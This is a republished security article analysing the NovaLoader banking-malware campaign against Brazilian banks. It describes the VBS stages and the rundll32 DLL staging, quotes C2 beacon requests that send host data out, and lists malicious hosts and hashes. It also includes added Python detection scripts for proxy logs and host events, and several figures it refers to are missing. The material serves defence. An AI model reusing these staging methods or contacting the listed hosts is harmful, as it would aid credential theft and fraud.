2025-01-24 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com)05/31 Report--
This article explains in detail what kind of software NovaLoader is. The editor found it very practical and shares it here for reference; I hope you gain something from reading it.
Recently, researchers detected an interesting malware campaign targeting Brazilian banks. The malware, called NovaLoader, is written in Delphi and uses Visual Basic Script (VBS) to extend its functionality. Although the final payload is not new and has been studied by many researchers, the multi-stage payload delivery observed this time had not been seen before.
Propagation method
In previous samples, the malware spread through spam, social engineering and phishing sites. The attackers use a variety of parameters and options to keep the malware spreading and to evade detection by security products. Generally speaking, they rely on popular legitimate services such as Dropbox, GitHub, Pastebin, AWS and GitLab, as well as dynamic DNS services such as No-IP and DynDNS.
According to the researchers' analysis, NovaLoader has used AutoIt, PowerShell and Batch scripts in its infection chain, but this is the first time it has been found using VBS as well. In addition, this attack uses encrypted scripts rather than merely obfuscating the script code as before.
Master Dropper
MD5: 4ef89349a52f9fcf9a139736e236217e
The main dropper of this malware is relatively simple: its only function is to decrypt the embedded VB script and run it:
The first stage script
The following figure shows the code before and after decryption of the embedded script.
The VBS file decrypts a URL (dwosgraumellsa [.] club/cabaco2.txt), downloads another encrypted script, decrypts it, and runs it:
Second stage script
The decrypted code snippet of the downloaded VB script is as follows:
The VB script sends a GET request to http://54.95.36[.]242/contaw.php, probably to notify the remote C2 server that it has run successfully on the target system. Next, it uses WMI queries to detect whether it is running in a virtual machine:
NovaLoader copies the following files to the directory "C:\Users\Public\":
C:\Windows\(system32|SysWOW64)\rundll32.exe
C:\Windows\(system32|SysWOW64)\Magnification.dll
Next, it downloads some dependent files from the following address:
32atendimentodwosgraumell [.] club/mi5a.php is stored, after decryption, as "C:\Users\Public\{random}4.zip".
32atendimentodwosgraumell [.] club/mi5a1.zip is stored as "C:\Users\Public\{random}1.zip".
32atendimentodwosgraumell [.] club/mi5asq.zip is stored as "C:\Users\Public\{random}sq.zip".
It then sends multiple GET requests to "54.95.36[.]242/contaw{1-7}.php":
GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_
In addition, it stores multiple malicious files in the "C:\Users\Public\" directory:
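The beacon requests quoted above carry host and environment data in the w= parameter, and the article's IoC list at the end gives the hosts to look for. As an added example, not code from the article or from the researchers who analysed the sample, the following Python scans constructed web-proxy log lines for both: it matches the contaw{N}.php path, URL-decodes w= and splits it into its underscore-separated fields (host identifier, OS string, flag, timestamp, disk sizes), and flags any request to a host from the IoC list after refanging the "[.]" notation. The log line layout, the client IPs and the "AB12" prefix standing in for the redacted part of the host identifier are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Defanged indicators copied from the article (the first one is the contaw
# beacon host); refang() turns them back into hostnames that match log data.
DEFANGED_IOCS = [
    "54.95.36[.]242",
    "dwosgraumellsa [.] club/cabaco2.txt",
    "32atendimentodwosgraumell [.] club/mi5a.php",
    "185 [.] 141 [.] 195 [.] 5/prt1.txt",
    "185 [.] 141 [.] 195 [.] 81/prt3.txt",
    "wn5zweb [.] online/works1.txt",
    "23 [.] 94 [.] 243 [.] 101/vdb1.txt",
    "167 [.] 114 [.] 31 [.] 95/gdo1.txt",
]

# Request path of the beacons quoted in the article: /contaw.php, /contaw2.php ... /contaw7.php
BEACON_PATH = re.compile(r"^/contaw(\d*)\.php$")


def refang(indicator: str) -> str:
    """Replace the '[.]' defanging (with or without surrounding spaces) by a real dot."""
    return re.sub(r"\s*\[\.\]\s*", ".", indicator.strip())


def ioc_hosts(indicators) -> set:
    """Lower-cased host part (domain or IP) of every refanged indicator."""
    return {refang(i).split("/", 1)[0].lower() for i in indicators}


def parse_beacon(url: str):
    """Decode a contaw beacon URL into its parts, or return None for any other URL.

    parse_qs URL-decodes the w= value; it is then split on '_', the separator
    visible in the captured requests (host identifier, OS name, flag,
    timestamp, 'CD=...' disk sizes).  Empty trailing fields are dropped.
    """
    parts = urlsplit(url)
    match = BEACON_PATH.match(parts.path)
    if not match:
        return None
    raw = parse_qs(parts.query).get("w", [""])[0]
    fields = [f.strip() for f in raw.split("_") if f.strip()]
    return {"host": parts.hostname, "stage": int(match.group(1) or 0), "fields": fields}


def scan_proxy_log(lines, indicators=DEFANGED_IOCS):
    """Return one alert dict per suspicious line.

    Each line is '<timestamp> <client-ip> <method> <url> <status>' (a constructed
    layout; adapt the split to the real proxy's format).
    """
    hosts = ioc_hosts(indicators)
    alerts = []
    for line in lines:
        try:
            ts, client, _method, url, _status = line.split()
        except ValueError:
            continue  # malformed line: skip it rather than abort the whole scan
        host = (urlsplit(url).hostname or "").lower()
        beacon = parse_beacon(url)
        reasons = []
        if host in hosts:
            reasons.append("known-ioc-host")
        if beacon is not None:
            reasons.append("contaw-beacon-pattern")
        if reasons:
            alerts.append({"time": ts, "client": client, "host": host,
                           "reasons": reasons, "beacon": beacon})
    return alerts


# Constructed log lines modelled on the requests quoted in the article;
# 'AB12' stands in for the redacted part of the host identifier.
SAMPLE_LOG = [
    "2019-02-01T17:05:01Z 10.0.0.5 GET http://54.95.36.242/contaw.php 200",
    "2019-02-01T17:05:02Z 10.0.0.5 GET http://54.95.36.242/contaw2.php?w=AB12BIT-PC_Microsoft%20Windows%207%20Professional%20_True 200",
    "2019-02-01T17:05:06Z 10.0.0.5 GET http://54.95.36.242/contaw7.php?w=AB12BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_ 200",
    "2019-02-01T17:05:07Z 10.0.0.5 GET http://dwosgraumellsa.club/cabaco2.txt 200",
    "2019-02-01T17:05:08Z 10.0.0.7 GET https://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_LOG):
        print(alert["time"], alert["client"], alert["host"], alert["reasons"], alert["beacon"])
```

The path pattern catches the beacon even when the C2 address changes, while the IoC match catches the second-stage download that has no distinctive path; keeping both reasons on the alert tells the analyst which rule fired.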
Finally, it uses the copied rundll32.exe to decrypt the DLL and run its exported function:
The third-stage payload is a DLL that acts as a loader for the final-stage payload. It is run via rundll32.exe, and its main function is to decrypt and load the final payload.
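The staging described above (rundll32.exe copied to C:\Users\Public and a DLL loaded from that same directory) gives a defender two simple host-based rules: a system binary executing from a non-system path, and a DLL mapped from a user-writable directory. Since Magnification.dll is itself a legitimate Windows library, the rule has to key on the load path, not the file name. The Python below is an added example, not code from the article or the researchers: it canonicalises Windows paths (case, slashes, dot segments) and triages a constructed feed of process-creation and image-load events whose field names ('type', 'image', 'loaded') are assumptions of this example; real Sysmon or EDR telemetry would be mapped onto them.

```python
import ntpath

# Directories from which rundll32.exe legitimately executes.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# The user-writable staging directory named in the article.
PUBLIC_DIR = r"c:\users\public"


def _norm(path: str) -> str:
    """Canonical form for comparison: backslashes, no '..' segments, lower case."""
    return ntpath.normpath(path).lower()


def is_rundll32_outside_system(image_path: str) -> bool:
    """True when rundll32.exe starts from anywhere other than System32/SysWOW64."""
    p = _norm(image_path)
    return ntpath.basename(p) == "rundll32.exe" and ntpath.dirname(p) not in SYSTEM_DIRS


def is_dll_from_public(loaded_path: str) -> bool:
    """True when a DLL is mapped from C:\\Users\\Public or any folder beneath it."""
    p = _norm(loaded_path)
    return p.endswith(".dll") and p.startswith(PUBLIC_DIR + "\\")


def triage(events):
    """Return (event, reason) pairs for every event matching either rule.

    events: dicts with 'type' ('process' or 'image_load'), 'image' (the
    executing binary) and, for image_load, 'loaded' (the DLL path).  These
    field names are assumed for the example; map real telemetry onto them.
    """
    hits = []
    for ev in events:
        if ev["type"] == "process" and is_rundll32_outside_system(ev["image"]):
            hits.append((ev, "rundll32.exe executed from a non-system directory"))
        elif ev["type"] == "image_load" and is_dll_from_public(ev["loaded"]):
            hits.append((ev, "DLL loaded from user-writable C:\\Users\\Public"))
    return hits


# Constructed events: a benign rundll32 run, the staged copy described in the
# article, its DLL load from the Public directory, and a benign image load.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe"},
    {"type": "process", "image": r"C:\Users\Public\rundll32.exe"},
    {"type": "image_load", "image": r"C:\Users\Public\rundll32.exe",
     "loaded": r"C:\Users\Public\Magnification.dll"},
    {"type": "image_load", "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\ntdll.dll"},
]

if __name__ == "__main__":
    for ev, reason in triage(SAMPLE_EVENTS):
        print(reason, "->", ev)
```

Normalising through ntpath.normpath before comparing means a path written as c:/users/PUBLIC/RUNDLL32.EXE is judged the same as the canonical spelling, so a mixed-case or forward-slash variant does not slip past the rule.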
Final Payload
The final-stage payload is written in Delphi and includes functions such as credential theft targeting major Brazilian banks. It also monitors browser window titles; if a matching Brazilian bank name is detected, the malware takes control of the target system, establishes a connection to the malicious C2 server, blocks the user from the real online banking page, and performs malicious operations in the background.
Some of the commands used by the malware are as follows:
Some of the bank-related strings in the malware are as follows:
IoC
MD5:
a7722ea1ca64fcd7b7ae2d7c86f13013
URL:
185 [.] 141 [.] 195 [.] 5/prt1.txt
185 [.] 141 [.] 195 [.] 81/prt3.txt
185 [.] 141 [.] 74/prt1.txt
dwosgraumellsa [.] club/cabaco2.txt
wn5zweb [.] online/works1.txt
23 [.] 94 [.] 243 [.] 101/vdb1.txt
167 [.] 114 [.] 31 [.] 95/gdo1.txt
167 [.] 93/gdo1.txt
That concludes the article on "What kind of software is NovaLoader?". I hope the above content was helpful to you and that you learned something from it; if you think the article is good, please share it so more people can see it.